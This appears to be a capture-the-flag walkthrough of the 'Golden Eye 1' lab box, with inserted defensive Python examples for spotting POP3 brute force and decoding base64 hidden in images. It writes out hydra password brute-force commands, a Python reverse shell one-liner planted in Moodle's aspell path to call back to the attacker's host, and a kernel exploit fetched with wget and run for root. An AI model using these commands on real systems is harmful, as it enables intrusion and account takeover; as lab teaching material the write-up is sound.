# Golden Eye 1

## Enumeration

### nmap

```
nmap -sC -sV -oA nmap/GEv1 192.168.1.116
```

```
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-23 05:18 EDT
Nmap scan report for 192.168.1.116
Host is up (0.00012s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
25/tcp open  smtp    Postfix smtpd
|_smtp-commands: ubuntu, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, 
|_ssl-date: TLS randomness does not represent time
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: GoldenEye Primary Admin Server
MAC Address: 00:0C:29:E4:96:14 (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 41.68 seconds

```

```
nmap -p- -Pn 192.168.1.116 
```

```
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-23 05:18 EDT
Nmap scan report for 192.168.1.116
Host is up (0.00067s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE
25/tcp    open  smtp
80/tcp    open  http
55006/tcp open  unknown
55007/tcp open  unknown
MAC Address: 00:0C:29:E4:96:14 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 3.55 seconds

```

We can see that there are two more unknown ports open on the server.

Let's open the IP in the web browser.

![](/files/-M80mU0x_rRluYzvaOvd)

Let's navigate to `/sev-home`

![](/files/-M80n1-lKQk68lc-fl0Y)

If we go back to the main page and open Inspect Element, we can see a JavaScript file.

![](/files/-M80nl-7jjXW1ZoXJa68)

We can see there is an encrypted password. I copied it and pasted it into the Google search bar, and surprisingly we got this:

![](/files/-M80uy0R3JkQ3SVWsQ1_)

The username is obviously `boris`, and we can log in.

![](/files/-M80vHXpHgFia8G86oGq)

We can see that there is a POP3 server running.

If we use nmap to enumerate both of the unknown ports:

```
nmap -sV -p 55006,55007 192.168.1.116
```

```
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-23 10:28 EDT
Nmap scan report for 192.168.1.116
Host is up (0.00030s latency).

PORT      STATE SERVICE     VERSION
55006/tcp open  ssl/unknown
55007/tcp open  pop3        Dovecot pop3d
MAC Address: 00:0C:29:E4:96:14 (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.42 seconds

```

Now we know that 55007 is running POP3.

## Exploitation

### Hydra

Then we can brute force the POP3 passwords of `boris` and `natalya`:

```
hydra -l boris -P /usr/share/wordlists/fasttrack.txt pop3://192.168.1.116:55007
```

```
hydra -l natalya -P /usr/share/wordlists/fasttrack.txt pop3://192.168.1.116:55007
```

![](/files/-M80xtwCV16Ez8yFniDC)

![](/files/-M80yuU-2utL2baG_mjI)
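From the server's side, the hydra runs above show up as a burst of failed POP3 logins for one user from one source address, followed by a success. As an added example that is not part of the original write-up, the Python below parses Dovecot-style `pop3-login` lines and flags sources that cross a failure threshold; the log lines are constructed to resemble Dovecot's output, the threshold of 5 is an assumption, and `parse_events` and `flag_brute_force` are names chosen here.

```python
"""Spot password guessing against a POP3 service from Dovecot-style log lines.

Added example, not part of the original write-up. The log lines are
constructed to resemble Dovecot's pop3-login messages; the threshold is an
assumption, not a Dovecot default.
"""
import re
from collections import defaultdict

# Constructed sample lines modelled on Dovecot's pop3-login output: a burst of
# failures for one user from one source, then a successful login, plus one
# unrelated failure from another host.
SAMPLE_LOG = """\
May 23 10:40:01 ubuntu dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<boris>, method=PLAIN, rip=192.168.1.113, lip=192.168.1.116
May 23 10:40:02 ubuntu dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<boris>, method=PLAIN, rip=192.168.1.113, lip=192.168.1.116
May 23 10:40:03 ubuntu dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<boris>, method=PLAIN, rip=192.168.1.113, lip=192.168.1.116
May 23 10:40:04 ubuntu dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<boris>, method=PLAIN, rip=192.168.1.113, lip=192.168.1.116
May 23 10:40:05 ubuntu dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<boris>, method=PLAIN, rip=192.168.1.113, lip=192.168.1.116
May 23 10:40:06 ubuntu dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<boris>, method=PLAIN, rip=192.168.1.113, lip=192.168.1.116
May 23 10:40:09 ubuntu dovecot: pop3-login: Login: user=<boris>, method=PLAIN, rip=192.168.1.113, lip=192.168.1.116, mpid=2231
May 23 10:41:00 ubuntu dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<alice>, method=PLAIN, rip=192.168.1.50, lip=192.168.1.116
"""

# Matches both the failed-login and the successful-login form of the message.
LINE_RE = re.compile(
    r"pop3-login: (?P<outcome>Login|Disconnected \(auth failed)[^:]*: "
    r"user=<(?P<user>[^>]*)>.*?rip=(?P<rip>[0-9.]+)"
)


def parse_events(log_text):
    """Return (remote_ip, user, succeeded) for every recognised login event."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.search(line)
        if m:
            events.append((m["rip"], m["user"], m["outcome"] == "Login"))
    return events


def flag_brute_force(log_text, threshold=5):
    """Return source IPs with at least `threshold` failed logins.

    Each entry records the failure count, the usernames tried and whether a
    successful login followed the failures (a guessed password, the worst case).
    """
    per_ip = defaultdict(
        lambda: {"failures": 0, "users": set(), "success_after_failures": False}
    )
    for rip, user, succeeded in parse_events(log_text):
        rec = per_ip[rip]
        if succeeded:
            if rec["failures"] > 0:
                rec["success_after_failures"] = True
        else:
            rec["failures"] += 1
            rec["users"].add(user)
    return {
        rip: {
            "failures": rec["failures"],
            "users": sorted(rec["users"]),
            "success_after_failures": rec["success_after_failures"],
        }
        for rip, rec in per_ip.items()
        if rec["failures"] >= threshold
    }


if __name__ == "__main__":
    for rip, rec in flag_brute_force(SAMPLE_LOG).items():
        print(f"{rip}: {rec['failures']} failures for {rec['users']}, "
              f"then success: {rec['success_after_failures']}")
```

The `success_after_failures` flag is the one worth alerting on, since it separates a noisy scan from a guessed password. The standard mitigation is to rate-limit failed logins per source at the service level, which is what fail2ban's dovecot jail does with the same pattern.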

Got the passwords! We can now log in to the POP3 server:

```
nc 192.168.1.116 55007
USER boris
PASS secret1!
LIST
RETR 1
RETR 2 
RETR 3
```

![](/files/-M80zCW_opDG9CuuKJPm)

Nothing seems very interesting here, so we move on to `natalya`.

Doing the same thing as for `boris`, we got something pretty interesting:

![](/files/-M80zlTmCSWD6k1SiO9R)

We got credentials, and we need to add the server IP to `/etc/hosts` and navigate to `severnaya-station.com/gnocertdir`.

After adding that hosts entry, we can go to the browser and navigate to `severnaya-station.com/gnocertdir`:

![](/files/-M811SAadFmusruBd4Ey)

We can log in with the given credentials.

Then we can navigate to Messages, where we can see that the next username is `doak`:

![](/files/-M8122BvFJdb30jjvy-2)

Now we can take the username `doak` and brute force with hydra again:

```
hydra -l doak -P /usr/share/wordlists/fasttrack.txt pop3://192.168.1.116:55007
```

![](/files/-M813PD_Bt6fulmj6emi)

We got the credentials, so we go back to the POP3 server and log in:

![](/files/-M813zpGYh_oMxfLLRoT)

We got the credentials, so we go back to Moodle and log in:

![](/files/-M814HhBHFsJGSDHwxoQ)

We then go to Private files, where there is a `s3cret.txt`:

![](/files/-M814Sg1yoeCcZSloCWa)

After cat-ing the file, we get this:

![](/files/-M815P3HdLucoP26QQ7r)

We can see that the picture leads to the admin credentials.

There is a link in the file; if we follow it:

![](/files/-M815ZENcv3iJ0UxxbsS)

If we download the picture and use the `strings` command to list all of its readable content, we get this:

![](/files/-M816K4qLuqLDQg-GAm6)

We can see that there is a base64-encoded line.

After decoding it we get:

![](/files/-M816UX7ooalZz4Vbc1h)
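The `strings` and base64 steps above, done in code as an added example that is not part of the original write-up: the file bytes and the credential hidden in them are constructed for the example, and `extract_strings`, `decode_base64_candidates` and `hunt` are names chosen here. It goes slightly beyond the manual step by filtering out base64-shaped strings that decode to non-text, which is the usual noise when scanning a real image.

```python
"""Recover readable strings from a binary file and decode base64-looking ones.

Added example, not part of the original write-up. It reproduces the
`strings` + base64 decode step in code, over a constructed PNG-like byte blob
(the file contents and the hidden credential are made up for the example).
"""
import base64
import binascii
import re

# Constructed credential, base64-encoded, standing in for the real one.
SECRET_B64 = base64.b64encode(b"example admin password").decode("ascii")

# Constructed sample file: PNG-like framing bytes around two base64-shaped
# strings, one of which decodes to readable text and one of which does not.
SAMPLE_FILE = (
    b"\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR\x00\x00\x01\x00"
    + b"\x12\x8f\x00tEXtComment\x00"
    + SECRET_B64.encode("ascii") + b"\x00"
    + b"\x00AAAAAAAAAAAAAAAAAAAAAAAA\x00"   # decoy: valid base64 that decodes to NUL bytes
    + b"\xf3\x91\x7fIEND\xaeB`\x82"
)

# A base64 blob: only alphabet characters, at least 16 of them, up to two '=' pads.
BASE64_RE = re.compile(r"^[A-Za-z0-9+/]{16,}={0,2}$")


def extract_strings(data, min_len=4):
    """Equivalent of `strings -n <min_len>`: runs of printable ASCII bytes."""
    pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [m.group().decode("ascii") for m in pattern.finditer(data)]


def decode_base64_candidates(strings):
    """Return (encoded, decoded) pairs for strings that are valid base64 and
    decode to printable text; anything else is skipped rather than reported."""
    found = []
    for s in strings:
        if len(s) % 4 != 0 or not BASE64_RE.match(s):
            continue
        try:
            raw = base64.b64decode(s, validate=True)
        except (binascii.Error, ValueError):
            continue
        try:
            text = raw.decode("ascii")
        except UnicodeDecodeError:
            continue
        if text.isprintable():
            found.append((s, text))
    return found


def hunt(data):
    """Whole pipeline: pull strings, then decode the base64 candidates."""
    return decode_base64_candidates(extract_strings(data))


if __name__ == "__main__":
    for encoded, decoded in hunt(SAMPLE_FILE):
        print(f"{encoded} -> {decoded!r}")
```

Running the same check over images and other assets before they are published is a cheap way to catch credentials left in comments or metadata, which is exactly what the picture in this box leaks.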

Let's log in to Moodle using the credentials we just got:

![](/files/-M817wXvNDPzY1tJ0qe1)

After playing around, I found out that under Site administration, Plugins, and Text editors, there is a TinyMCE HTML editor.

We need to change the Spell engine from Google Spell to PSpellShell.

![](/files/-M818Rk730eblkM6kE-E)

Then, under Server and System paths, we can see that there is a "Path to aspell" field.

### Reverse Shell

I tried using netcat, but it doesn't work, so we change the field to a Python reverse shell.

```
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.113",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
```

![](/files/-M818aW4kd6el8xq5cw0)

Then we set up a listener on our machine:

```
nc -nlvp 4444
```

Then we can go to the blog and add a new entry:

![](/files/-M81AF7hrJhImW8VjWYU)

After that, click the spell check button to get the reverse shell:

![](/files/-M81AKydMz7PtmiKxd30)

![](/files/-M81AOgAG-vWp-hI6yEp)

Then we can spawn a proper TTY with a Python command:

```
python -c 'import pty; pty.spawn("/bin/bash")'
```

## Privilege Escalation

If we type `uname -a`, we can see that the kernel is out of date.

![](/files/-M81BLKhkAMNVFjVxRdT)

We can then run searchsploit against the kernel version.

![](/files/-M81BSwEeL52L4VB1A7m)

After that we copy the exploit to our working directory. I tried to transfer the file to the target machine, but `gcc` is not available there; `cc` is.

So we need to change one thing in the exploit:

Change `gcc` to `cc`.

![](/files/-M81BmhYGlszbii6Kljc)

![](/files/-M81BrEMymU7sGNdf-Cx)

Then on our machine we can fire up SimpleHTTPServer using Python:

```
python -m SimpleHTTPServer
```

![](/files/-M81C7814oXEr_fhwcfi)

On the target machine, navigate to the `/tmp` directory and `wget` the file:

![](/files/-M81CQpKnEqTqrUGKqUx)

Then we can type:

```
cc 37292.c -o exploit
chmod +x exploit
./exploit
```

![](/files/-M81CiBjFhq3U1hcljId)

Navigate to `/root` and read `.flag.txt`:

![](/files/-M81CouHn-8k3kQkM9E5)

Then we can navigate to the URL it provides:

![](/files/-M81D0ltZFjL8VaKGrMZ)

Congratulations!

